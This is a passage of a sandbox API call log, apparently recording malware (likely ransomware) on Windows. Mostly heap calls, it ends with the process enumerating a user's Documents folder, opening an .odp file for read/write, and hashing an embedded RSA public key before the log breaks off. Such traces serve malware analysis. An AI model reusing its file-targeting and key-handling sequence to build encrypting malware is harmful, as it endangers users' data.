out: hHeap=0x6a0000) returned 1 [0188.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.404] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0188.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ef8 [0188.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.405] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0188.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0188.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ef8 | out: hHeap=0x6a0000) returned 1 [0188.405] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0188.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.406] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.406] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.406] PathFindFileNameW (pszPath="") returned="" [0188.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.406] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11bff20, ftCreationTime.dwHighDateTime=0x1d8a2b0, ftLastAccessTime.dwLowDateTime=0x44edc060, ftLastAccessTime.dwHighDateTime=0x1d8a2b2, ftLastWriteTime.dwLowDateTime=0x44edc060, ftLastWriteTime.dwHighDateTime=0x1d8a2b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0188.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.408] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11bff20, ftCreationTime.dwHighDateTime=0x1d8a2b0, ftLastAccessTime.dwLowDateTime=0x44edc060, ftLastAccessTime.dwHighDateTime=0x1d8a2b2, ftLastWriteTime.dwLowDateTime=0x44edc060, ftLastWriteTime.dwHighDateTime=0x1d8a2b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.408] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7247e450, ftCreationTime.dwHighDateTime=0x1d8a451, ftLastAccessTime.dwLowDateTime=0xba2ccf70, ftLastAccessTime.dwHighDateTime=0x1d8a4be, ftLastWriteTime.dwLowDateTime=0xba2ccf70, ftLastWriteTime.dwHighDateTime=0x1d8a4be, nFileSizeHigh=0x0, nFileSizeLow=0xba0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EXsKx.odp", cAlternateFileName="")) returned 1 [0188.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x723d10 [0188.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.408] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\EXsKx.odp") returned=".odp" [0188.408] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\EXsKx.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\exskx.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.416] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=47626) returned 1 [0188.416] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0188.419] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb9e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.419] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0188.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.428] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.428] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xba0a, lpOverlapped=0x0) returned 1 [0188.429] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0188.429] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.429] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.429] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0188.431] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0188.431] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.431] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0188.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0188.431] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0188.431] GetLastError () returned 0x0 [0188.431] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0188.431] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0188.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0188.431] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0188.431] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0188.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.431] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0188.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xba10) returned 0x2d43778 [0188.432] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0188.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0188.433] RtlAllocateHeap 